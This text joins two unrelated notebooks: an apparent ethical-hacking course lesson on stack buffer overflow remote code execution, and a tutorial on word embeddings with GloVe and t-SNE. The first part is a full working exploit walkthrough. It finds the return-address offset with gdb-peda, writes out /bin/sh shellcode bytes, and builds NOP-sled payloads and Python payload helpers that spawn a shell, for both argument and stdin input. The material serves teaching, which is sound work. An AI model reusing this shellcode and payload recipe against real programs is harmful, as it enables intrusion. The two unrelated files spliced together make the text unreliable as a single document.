# - Jupyter notebook doesn't give shell/terminal
#
# ```
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./system_shell.exe
# $ whoami
# kali
# $ date
# Wed 16 Dec 2020 10:37:24 PM MST
# $ exit
# ```
#
# - note that shellcode:
# - typically is NOT bash command string by itself - /bin/sh
# - is executable binary when executed gives shell/terminal
# - typically written in C/assembly and compiled/assembled as a binary
# - if stored in stack as a part of buffer, stack must be Executable!
# - so the buffer can be treated as executable code
#
#
# ## Remote code execution demos
# - make stack executable
# - use stack variable to store the remote shellcode
# - find the location of the shellcode and execute it
#
# ### Use program argument to smuggle shellcode
# - if the vulnerable program uses argument to get the data, provide shellcode instead of data!
# - let's demonstrate it with `demos/stack_overflow/so_arg.cpp` program
# let's look at the source
# program simply copies and prints the user provided argument
# ! cat demos/stack_overflow/so_arg.cpp
# + language="bash"
# # let's compile and execute the program
# input="demos/stack_overflow/so_arg.cpp"
# output=so_arg.exe
# echo kali | sudo -S ./compile.sh $input $output
# -
# ### crash the program
# - provide a large string and see how the program behaves
# - if the program crashes, the program's availability is violated, which is a telltale sign that it is likely vulnerable to stack overflow!
# ! ./so_arg.exe $(python3 -c 'print("A"*100)')
# note the buffer address!
# How do you know the program has crashed?
# On terminal you'll see segfault!
# On Jupyter notebook it's not obvious...
# provide a longer argument and see if the program segfaults
# ! ./so_arg.exe $(python3 -c 'print("A"*128)')
# also note the buffer address
# provide a longer argument and see if the program segfaults
# ! ./so_arg.exe $(python3 -c 'print("A"*140)')
# buffer size is 128; 124 As crashes the program; notice no Good bye! printed
# also note the buffer address
# - let's verify it on from the terminal that the program actually crashed
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*140)')
# buffer is at 0xffffc2d0
# buffer contains:
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# zsh: segmentation fault ./so_arg.exe $(python3 -c 'print("A"*140)')
# ```
# ### Remote code execution steps
#
# 1. find the offset using gdb-peda
# 2. generate shellcode using tools (peda, pwntools) or find the right shellcode at [http://shell-storm.org/shellcode/](http://shell-storm.org/shellcode/)
# 3. find the return address of buffer or nop sled
# 4. create payload and send it to the target program appropriately
#
# ### Exploiting using bash and gdb-peda
#
# - find the offset using gdb-peda
# - we'll find the offset that overwrites the caller's return address
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q so_arg.exe
# Reading symbols from so_arg.exe...
# ```
#
# - create a cyclic pattern (long enough: 200 bytes) as an argument and use it to run the program
#
# ```bash
# gdb-peda$ pattern arg 200
# Set 1 arguments to program
#
# gdb-peda$ run
#
# Starting program: /home/kali/EthicalHacking/so_arg.exe 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA'
# buffer is at 0xffffc250
# buffer contains:
# AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA
#
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>: push ebx)
# EBX: 0x6c414150 ('PAAl')
# ECX: 0x6c0
# EDX: 0x8051bb0 ("AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA"...)
# ESI: 0xf7de6000 --> 0x1e4d6c
# EDI: 0xf7de6000 --> 0x1e4d6c
# EBP: 0x41514141 ('AAQA')
# ESP: 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# EIP: 0x41416d41 ('AmAA')
# EFLAGS: 0x10286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41416d41
# [------------------------------------stack-------------------------------------]
# 0000| 0xffffc2e0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0004| 0xffffc2e4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0008| 0xffffc2e8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0012| 0xffffc2ec ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0016| 0xffffc2f0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0020| 0xffffc2f4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0024| 0xffffc2f8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0028| 0xffffc2fc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41416d41 in ?? ()
# ```
#
# ```bash
#
# gdb-peda$ patts
# Registers contain pattern buffer:
# EBX+0 found at offset: 132
# EBP+0 found at offset: 136
# EIP+0 found at offset: 140 <---- !!!THIS IS THE OFFSET!!!
# Registers point to pattern buffer:
# [EDX] --> offset 0 - size ~203
# [ESP] --> offset 144 - size ~56
# Pattern buffer found at:
# 0x08051bb0 : offset 0 - size 200 ([heap])
# 0xf7c000cd : offset 33208 - size 4 (/usr/lib32/libm-2.31.so)
# 0xffffc250 : offset 0 - size 200 ($sp + -0x90 [-36 dwords])
# 0xffffc625 : offset 0 - size 200 ($sp + 0x345 [209 dwords])
# References to pattern buffer found at:
# 0xf7de6d24 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d28 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d2c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d30 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d34 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d38 : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xf7de6d3c : 0x08051bb0 (/usr/lib32/libc-2.31.so)
# 0xffffbbc4 : 0x08051bb0 ($sp + -0x71c [-455 dwords])
# 0xffffbbe8 : 0x08051bb0 ($sp + -0x6f8 [-446 dwords])
# 0xffffbc14 : 0x08051bb0 ($sp + -0x6cc [-435 dwords])
# 0xffffbc30 : 0x08051bb0 ($sp + -0x6b0 [-428 dwords])
# 0xffffbc34 : 0x08051bb0 ($sp + -0x6ac [-427 dwords])
# 0xffffbc44 : 0x08051bb0 ($sp + -0x69c [-423 dwords])
# 0xffffbc94 : 0x08051bb0 ($sp + -0x64c [-403 dwords])
# 0xffffc0d8 : 0x08051bb0 ($sp + -0x208 [-130 dwords])
# 0xffffc124 : 0x08051bb0 ($sp + -0x1bc [-111 dwords])
# 0xf7e62dcc : 0xffffc250 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffbd40 : 0xffffc250 ($sp + -0x5a0 [-360 dwords])
# 0xf7e650b7 : 0xffffc625 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffc3b8 : 0xffffc625 ($sp + 0xd8 [54 dwords])
#
# ```
#
# - the buffer address is conveniently printed every time the program is executed
#
# ```bash
#
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*10)') 139 ⨯
# buffer is at 0xffffc360 <--------- buffer address; will this shift as the argument length changes?
# buffer contains:
# AAAAAAAAAA
# Good bye!
# ```
# ### need shellcode
#
# - next we need a **shellcode**
# - a bunch of binary shellcode files are already provided in `shellcode` folder
# ! ls -l ./shellcode/
# ### generate shellcode with GDB-PEDA
#
# - PEDA provides several shellcodes to pick from
# - the following command generates linux/x86 local shellcode
#
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q
# gdb-peda$ shellcode generate
# Available shellcodes:
# x86/linux exec
# x86/linux bindport
# x86/linux connect
# x86/bsd exec
# x86/bsd bindport
# x86/bsd connect
#
# gdb-peda$ shellcode generate x86/linux exec
# # x86/linux/exec: 24 bytes
# shellcode = (
# "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31"
# "\xc9\x89\xca\x6a\x0b\x58\xcd\x80"
# )
#
# ```
# - you can write the generated shellcode to a file for easy access
# - copy the hex values between " " line by line and append them to a binary file
# - you can use bash echo or python3
# - the following code demonstrates writing the shellcode to a file using the echo command
# -n : do not print the trailing newline
# -e : enable interpretation of backslash escapes
# ! echo -ne "\x31\xc0\x50\x68\x2f\x2f\x73\x68" > shellcode_bash.bin
# ! echo -ne "\x68\x2f\x62\x69\x6e\x89\xe3\x31" >> shellcode_bash.bin
# ! echo -ne "\xc9\x89\xca\x6a\x0b\x58\xcd\x80" >> shellcode_bash.bin
# ! wc -c shellcode_bash.bin
# ! hexdump -C shellcode_bash.bin
# - the following Python3 script writes the shellcode to a binary file
# Python3 script
with open('shellcode_py3.bin', 'wb') as fout:
fout.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31")
fout.write(b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")
# ! wc -c shellcode_py3.bin
# ! hexdump -C shellcode_py3.bin
# - the following command shows using Python3 from terminal to write the shellcode to a binary file
# Python3 from terminal
# ! python3 -c 'import sys; sys.stdout.buffer.write(b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\x6a\x0b\x58\xcd\x80")' > shellcode1_py3.bin
# ! wc -c shellcode1_py3.bin
# ! hexdump -C shellcode1_py3.bin
# ### create payload
#
# - recall payload has the following structure
# ```
# | NOP sled | shellcode | controlled return address |
# ```
#
# - we found that the total payload length is **144 bytes**, since the offset is **140**
# - our shellcode (see above) is **24** bytes long
# - total bytes remaining for NOP sled and repeated return address can be calculated as following
print(144-24)
# - out of the remaining **120** bytes, the return address size is 4 on a 32-bit system
# - let's repeat the return address *5 times*
# - so the size of repeated return address = **5\*4 = 20**
# - that leaves us with **120 - 20 = 100 NOP sled**
# - **make sure length of (NOP sled + Shellcode) is a multiple of 4!**
# - so that one of the 4-byte repeated return addresses aligns perfectly at the (EBP+4) location
# - so, we'll create the payload file of the following structure
#
# ```
# | 100 NOP sled | 24 bytes shellcode | 5 controlled return addresses |
# ```
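The size bookkeeping above can be sketched in a few lines of Python; the constants mirror the numbers derived for this particular binary and should be treated as assumptions for your own target:

```python
# Payload size bookkeeping (numbers from the analysis above)
TOTAL_LEN = 144       # offset 140 + 4 bytes to overwrite the saved return address
SHELLCODE_LEN = 24    # length of the generated x86/linux exec shellcode
RET_SIZE = 4          # return address size on a 32-bit system
RET_REPEATS = 5       # how many times the return address is repeated

nop_len = TOTAL_LEN - SHELLCODE_LEN - RET_REPEATS * RET_SIZE
# NOP sled + shellcode must be a multiple of 4 so a return address
# lands exactly at the (EBP+4) location
assert (nop_len + SHELLCODE_LEN) % 4 == 0
print(nop_len)  # 100
```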
# let's create a NOP sled 100 bytes long and write it to the payload.bin file
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*100)' > payload.bin
# let's append shellcode_py3.bin to payload.bin file
# ! cat shellcode_py3.bin >> payload.bin
# ! wc -c payload.bin
# - what's the address of buffer?
# - make sure we use the same size of junk as the size of the payload
# - this should be run directly from terminal as the buffer will shift if the program is run from the notebook
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(python3 -c 'print("A"*144, end="")') <-- make sure to pass 144 bytes !!
# buffer is at 0xffffc2d0 <---- accurate buffer address we need
# buffer contains:
# AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
# zsh: segmentation fault ./so_arg.exe $(python3 -c 'print("A"*144, end="")')
# ```
#
# - you can try landing at the base address of buffer or some bytes away from it, just in case!
# it's recommended to pick about 20 bytes away from the base address of the buffer
# if possible and necessary
# ! printf "%x" $((0xffffc2d0+20))
# but, let's just use the buffer's base address to start with...
# we repeat the return address 5 times
# ! python -c 'import sys; sys.stdout.buffer.write(b"\xd0\xc2\xff\xff"*5)' >> payload.bin
# our payload is ready; let's check the size to make sure it matches the total payload length (144)
# ! wc -c payload.bin
# let's see the content using hexdump
# ! hexdump -C payload.bin
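The sled/shellcode/return-address steps can also be done in one Python script; `struct.pack("<I", ...)` produces the little-endian encoding of the address. The address below is the one observed in this particular terminal session and will differ on your machine, and `payload_py.bin` is just an alternative file name to avoid clobbering the file built above:

```python
import struct

shellcode = (b"\x31\xc0\x50\x68\x2f\x2f\x73\x68"
             b"\x68\x2f\x62\x69\x6e\x89\xe3\x31"
             b"\xc9\x89\xca\x6a\x0b\x58\xcd\x80")
ret_addr = 0xffffc2d0                          # buffer address from *your* run
payload = (b"\x90" * 100                       # 100-byte NOP sled
           + shellcode                         # 24-byte shellcode
           + struct.pack("<I", ret_addr) * 5)  # return address repeated 5 times
assert len(payload) == 144
with open("payload_py.bin", "wb") as fout:
    fout.write(payload)
```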
# #### finally, run the target program with the payload
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ ./so_arg.exe $(cat payload.bin)
# buffer is at 0xffffc2d0
# buffer contains:
# ����������������������������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
# X��������������������
# $ whoami
# kali
# $ date
# Wed Dec 16 23:32:08 MST 2020
# $ exit
#
# ```
# ## Use standard input to smuggle the shellcode
#
# - if the program takes data from standard input and the buffer overrun is possible, then shellcode can still be transmitted and the program exploited
# - the steps are slightly different from sending shellcode as an argument
# - let's work with `so_stdio.cpp` program to demonstrate the steps
# ! cat ./demos/stack_overflow/so_stdio.cpp
# + language="bash"
# input="./demos/stack_overflow/so_stdio.cpp"
# output=so_stdio.exe
#
# echo kali | sudo -S ./compile.sh $input $output
# -
# - since the so_stdio.exe program reads its data from standard input, the data can be piped to the program
# ! python -c 'print("Hello World")' | ./so_stdio.exe
# ### Crash the program
#
# - a quick way to tell whether a program has a buffer overrun vulnerability is to send a long string and see how the program reacts
# - if the program segfaults, it's a telltale sign that the program has a buffer overflow flaw
# ! python -c 'print("A"*100)' | ./so_stdio.exe
# - because the buffer size is 128 bytes and we sent only 100, the program handled it as expected
# try longer string
# ! python -c 'print("A"*200)' | ./so_stdio.exe
# since Good bye! is not printed, the program must have crashed!
# - so 200 is long enough (perhaps too long) to crash the program
# - let's find the offset of the caller's return address with respect to the buffer in gdb-peda
# - use PEDA's cyclic pattern technique as it's much faster than stepping through GDB
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ gdb -q so_stdio.exe
# Reading symbols from so_stdio.exe...
# ```
#
# - since the program reads the data from standard input, we need to pipe the cyclic pattern from a file
#
# ```bash
# gdb-peda$ pattern create 200 pattern.txt
# Writing pattern of 200 chars to filename "pattern.txt"
#
# gdb-peda$ run < pattern.txt
#
# Starting program: /home/kali/EthicalHacking/so_stdio.exe < pattern.txt
# buffer is at 0xffffc310
# Give me some text: Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA with length 200
#
# Program received signal SIGSEGV, Segmentation fault.
# [----------------------------------registers-----------------------------------]
# EAX: 0xf7fb2c00 --> 0xf7faf990 --> 0xf7ef71b0 (<_ZNSoD1Ev>: push ebx)
# EBX: 0x41416b41 ('AkAA')
# ECX: 0x6c0
# EDX: 0x8051bb0 ("Acknowledged: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AAIAAeAA4AAJAAfAA5AAKAAgAA6AALAAhAA7AAMAAiAA8AANAAjAA9AAOAAkAAPAAlAAQAAmAARAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAA"...)
# ESI: 0x6c414150 ('PAAl')
# EDI: 0xf7de6000 --> 0x1e4d6c
# EBP: 0x41514141 ('AAQA')
# ESP: 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# EIP: 0x41416d41 ('AmAA')
# EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction overflow)
# [-------------------------------------code-------------------------------------]
# Invalid $PC address: 0x41416d41
# [------------------------------------stack-------------------------------------]
# 0000| 0xffffc3a0 ("RAAoAASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0004| 0xffffc3a4 ("AASAApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0008| 0xffffc3a8 ("ApAATAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0012| 0xffffc3ac ("TAAqAAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0016| 0xffffc3b0 ("AAUAArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0020| 0xffffc3b4 ("ArAAVAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0024| 0xffffc3b8 ("VAAtAAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# 0028| 0xffffc3bc ("AAWAAuAAXAAvAAYAAwAAZAAxAAyA")
# [------------------------------------------------------------------------------]
# Legend: code, data, rodata, value
# Stopped reason: SIGSEGV
# 0x41416d41 in ?? ()
#
# ```
#
# - now let's search for pattern to find the offset
#
# ```bash
# gdb-peda$ patts
#
# Registers contain pattern buffer:
# EBX+0 found at offset: 128
# EBP+0 found at offset: 136
# ESI+0 found at offset: 132
# EIP+0 found at offset: 140 <------ THIS IS OUR OFFSET !!!
# Registers point to pattern buffer:
# [ESP] --> offset 144 - size ~56
# Pattern buffer found at:
# 0x08051bbe : offset 0 - size 200 ([heap])
# 0x08051fc0 : offset 0 - size 200 ([heap])
# 0xf7c000cd : offset 33208 - size 4 (/usr/lib32/libm-2.31.so)
# 0xffffc310 : offset 0 - size 200 ($sp + -0x90 [-36 dwords])
# References to pattern buffer found at:
# 0xf7de6584 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6588 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de658c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6590 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6594 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de6598 : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7de659c : 0x08051fc0 (/usr/lib32/libc-2.31.so)
# 0xf7b6497c : 0xffffc310 (/usr/lib32/libm-2.31.so)
# 0xf7e62d0c : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
# 0xf7e668dc : 0xffffc310 (/usr/lib32/libstdc++.so.6.0.28)
# 0xffffbe00 : 0xffffc310 ($sp + -0x5a0 [-360 dwords])
#
# ```
#
# - so, the payload must be **144 bytes** long to completely overwrite the caller's return address
# - next, we need to find the base address of the buffer, whose location doesn't change with the size of the standard input data provided to the program
# - the base address of buffer is conveniently printed
# - create the payload in the form
# ```
# | NOP sled | shellcode | repeated return address |
# ```
# - we need to do some math to figure out the length of NOP sled and repeated return address we need to make the total payload length to be **144 bytes**
# - the shellcode size is fixed; let's copy it and check its size
# ! cp ./shellcode/shellcode.bin .
# ! wc -c shellcode.bin
# this leaves us with
print(144-24)
# - since we have 120 bytes, let's repeat the return address 10 times just in case
# - with the repeated return address length = `10 * 4 = 40`
# NOP sled length
print(120-40)
# - so we can use 80 NOP bytes as sled to slide down to our shellcode
# - now we have all the numbers we need to create our 144 long payload with shellcode
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x90"*80)' > stdio_payload.bin
# ! wc -c stdio_payload.bin
# ! cat shellcode.bin >> stdio_payload.bin
# ! wc -c stdio_payload.bin
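The same construction can be wrapped in a small reusable helper; this is a sketch, where `total_len` and `ret_repeats` are the values derived above and the `b"\xcc" * 24` shellcode is a 24-byte placeholder standing in for the real one:

```python
import struct

def build_payload(ret_addr, shellcode, total_len=144, ret_repeats=10):
    """Sketch: | NOP sled | shellcode | repeated little-endian return address |."""
    ret = struct.pack("<I", ret_addr) * ret_repeats
    sled = b"\x90" * (total_len - len(shellcode) - len(ret))
    payload = sled + shellcode + ret
    assert len(payload) == total_len
    return payload

# e.g. with a 24-byte placeholder shellcode and the buffer address seen in the terminal
demo = build_payload(0xffffc360, b"\xcc" * 24)
print(len(demo))  # 144
```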
# - we need to get the buffer's address from the terminal, not from the Jupyter Notebook!
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ python -c 'print("A"*10)' | ./so_stdio.exe
# buffer is at 0xffffc360 <------ BASE ADDRESS OF BUFFER !!!
# Give me some text: Acknowledged: AAAAAAAAAA with length 10
# Good bye!
#
# ```
# ! python -c 'import sys; sys.stdout.buffer.write(b"\x60\xc3\xff\xff"*10)' >> stdio_payload.bin
# ! wc -c stdio_payload.bin
# - payload is ready and let's send it to the target program from the terminal
# - note the - (hyphen) after cat command is required to make the shell interactive
# - we don't get a prompt but an accessible terminal; just write some commands such as `whoami`, `ls`, etc.
#
# ```bash
# ┌──(kali㉿K)-[~/EthicalHacking]
# └─$ cat stdio_payload.bin - | ./so_stdio.exe
# buffer is at 0xffffc360
# Give me some text:
# Acknowledged: ��������������������������������������������������������������������������������1�Ph//shh/bin��1ɉ�j
# X`���`���`���`���`���`���`���`���`���`��� with length 144
# whoami
# kali
# date
# Wed Dec 16 23:52:28 MST 2020
# exit
# ```
|
StackOverflow-RemoteCodeExecution.ipynb
|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.5'
# jupytext_version: 1.14.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# + [markdown] colab_type="text" id="17XKXlnyVBQF"
# # Embeddings
#
# An embedding maps discrete, categorical values to a continuous space. Major advances in NLP applications have come from these continuous representations of words.
#
# If we have some sentence,
# + colab_type="code" id="303nHJfnVCoR" colab={}
# !pip install pymagnitude pytorch_pretrained_bert -q
# + colab_type="code" id="_H68bmuYVBQA" colab={}
import torch
import torch.nn as nn
from pymagnitude import Magnitude
import numpy as np
from tqdm import tqdm_notebook as tqdm
from scipy import spatial
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
from pytorch_pretrained_bert import BertTokenizer, BertModel, BertForMaskedLM
# %config InlineBackend.figure_format = 'svg'
# %matplotlib inline
RED, BLUE = '#FF4136', '#0074D9'
# + colab_type="code" id="fxTuHmKiVBQH" colab={}
sentence = 'the quick brown fox jumps over the lazy dog'
words = sentence.split()
words
# + [markdown] colab_type="text" id="iKfSGpJxVBQP"
# We first turn this sentence into numbers by assigning each unique word an integer.
# + colab_type="code" id="LWXE9OmDVBQR" colab={}
word2idx = {word: idx for idx, word in enumerate(sorted(set(words)))}
word2idx
# + [markdown] colab_type="text" id="R8plCT7bVBQX"
# Then, we turn each word in our sentence into its assigned index.
# + colab_type="code" id="aB40yyPSVBQY" colab={}
idxs = torch.LongTensor([word2idx[word] for word in sentence.split()])
idxs
# + [markdown] colab_type="text" id="4xE--RIrVBQe"
# Next, we want to create an **embedding layer**. The embedding layer is a 2-D matrix of shape `(n_vocab x embedding_dimension)`. If we apply our input list of indices to the embedding layer, each value in the input list of indices maps to that specific row of the embedding layer matrix. The output shape after applying the input list of indices to the embedding layer is another 2-D matrix of shape `(n_words x embedding_dimension)`.
# + colab_type="code" id="VlF7QIr5VBQg" colab={}
embedding_layer = nn.Embedding(num_embeddings=len(word2idx), embedding_dim=3)
embeddings = embedding_layer(idxs)
embeddings, embeddings.shape
# + [markdown] colab_type="text" id="5G_N4Cb0VBQl"
# The PyTorch builtin embedding layer comes with randomly initialized weights that are updated with gradient descent as your model learns to map input indices to some kind of output. However, often it is better to use pretrained embeddings that do not update but instead are frozen.
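Freezing looks like this in PyTorch: `nn.Embedding.from_pretrained` loads an existing weight matrix and disables gradient updates. In this sketch a random matrix stands in for real pretrained vectors:

```python
import torch
import torch.nn as nn

pretrained_weights = torch.randn(9, 50)  # stand-in for a real (n_vocab x dim) matrix
frozen_embedding = nn.Embedding.from_pretrained(pretrained_weights, freeze=True)
print(frozen_embedding.weight.requires_grad)  # False
```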
# + [markdown] colab_type="text" id="nWFKrgx-VBQm"
# ## GloVe Embeddings
#
# GloVe embeddings are one of the most popular pretrained word embeddings in use. You can download them [here](https://nlp.stanford.edu/projects/glove/). For the best performance for most applications, I recommend using their Common Crawl embeddings with 840B tokens; however, they take the longest to download, so instead let's download the Wikipedia embeddings with 6B tokens.
# + colab_type="code" id="FKo_Pg6wVBQn" colab={}
# Download GloVe vectors (uncomment the below)
# # !wget http://nlp.stanford.edu/data/glove.6B.zip && unzip glove.6B.zip && mkdir glove && mv glove*.txt glove
# GLOVE_FILENAME = 'glove/glove.6B.50d.txt'
# glove_index = {}
# n_lines = sum(1 for line in open(GLOVE_FILENAME))
# with open(GLOVE_FILENAME) as fp:
# for line in tqdm(fp, total=n_lines):
# split = line.split()
# word = split[0]
# vector = np.array(split[1:]).astype(float)
# glove_index[word] = vector
# glove_embeddings = np.array([glove_index[word] for word in words])
# # Because the length of the input sequence is 9 words and the embedding
# # dimension is 50, the output shape is `(9 x 50)`.
# glove_embeddings.shape
# + [markdown] colab_type="text" id="2StD14zGVBQ3"
# ### Magnitude Library for Fast Vector Loading
# + [markdown] colab_type="text" id="rvyAGoEIVBQ4"
# Loading the entire GloVe file can take up a lot of memory. We can use the `magnitude` library for more efficient embedding vector loading. You can download the magnitude version of GloVe embeddings [here](https://github.com/plasticityai/magnitude#pre-converted-magnitude-formats-of-popular-embeddings-models).
# + colab_type="code" id="vnzGlMubVBQ5" colab={}
# !wget http://magnitude.plasticity.ai/glove/light/glove.6B.50d.magnitude -P glove/
# + colab_type="code" id="w-0r7FHLVBQ-" colab={}
# Load Magnitude GloVe vectors
glove_vectors = Magnitude('glove/glove.6B.50d.magnitude')
# + colab_type="code" id="DP2sOnZ1VBRC" colab={}
glove_embeddings = glove_vectors.query(words)
# + [markdown] colab_type="text" id="ARcZ2PwsVBRG"
# ## Similarity operations on embeddings
# + colab_type="code" id="8Ara5883VBRH" colab={}
def cosine_similarity(word1, word2):
vector1, vector2 = glove_vectors.query(word1), glove_vectors.query(word2)
return 1 - spatial.distance.cosine(vector1, vector2)
# + colab_type="code" id="LQV1Ur9PVBRO" colab={}
word_pairs = [
('dog', 'cat'),
('tree', 'cat'),
('tree', 'leaf'),
('king', 'queen'),
]
for word1, word2 in word_pairs:
print(f'Similarity between "{word1}" and "{word2}":\t{cosine_similarity(word1, word2):.2f}')
# + [markdown] colab_type="text" id="3mvCSt-2VBRV"
# ## Visualizing Embeddings
#
# We can demonstrate that embeddings carry semantic information by plotting them. However, because our embeddings have more than three dimensions, they are impossible to visualize directly. Therefore, we can use an algorithm called t-SNE to project the word embeddings to a lower dimension in order to plot them in 2-D.
# + colab_type="code" id="MYoO6T2kVBRX" colab={}
ANIMALS = [
'whale',
'fish',
'horse',
'rabbit',
'sheep',
'lion',
'dog',
'cat',
'tiger',
'hamster',
'pig',
'goat',
'lizard',
'elephant',
'giraffe',
'hippo',
'zebra',
]
HOUSEHOLD_OBJECTS = [
'stapler',
'screw',
'nail',
'tv',
'dresser',
'keyboard',
'hairdryer',
'couch',
'sofa',
'lamp',
'chair',
'desk',
'pen',
'pencil',
'table',
'sock',
'floor',
'wall',
]
# + colab_type="code" id="5R_k2AiCVBRd" colab={}
tsne_words_embedded = TSNE(n_components=2).fit_transform(glove_vectors.query(ANIMALS + HOUSEHOLD_OBJECTS))
tsne_words_embedded.shape
# + colab_type="code" id="OfM7fFagVBRh" colab={}
x, y = zip(*tsne_words_embedded)
fig, ax = plt.subplots(figsize=(10, 8))
for i, label in enumerate(ANIMALS + HOUSEHOLD_OBJECTS):
if label in ANIMALS:
color = BLUE
elif label in HOUSEHOLD_OBJECTS:
color = RED
ax.scatter(x[i], y[i], c=color)
ax.annotate(label, (x[i], y[i]))
ax.axis('off')
plt.show()
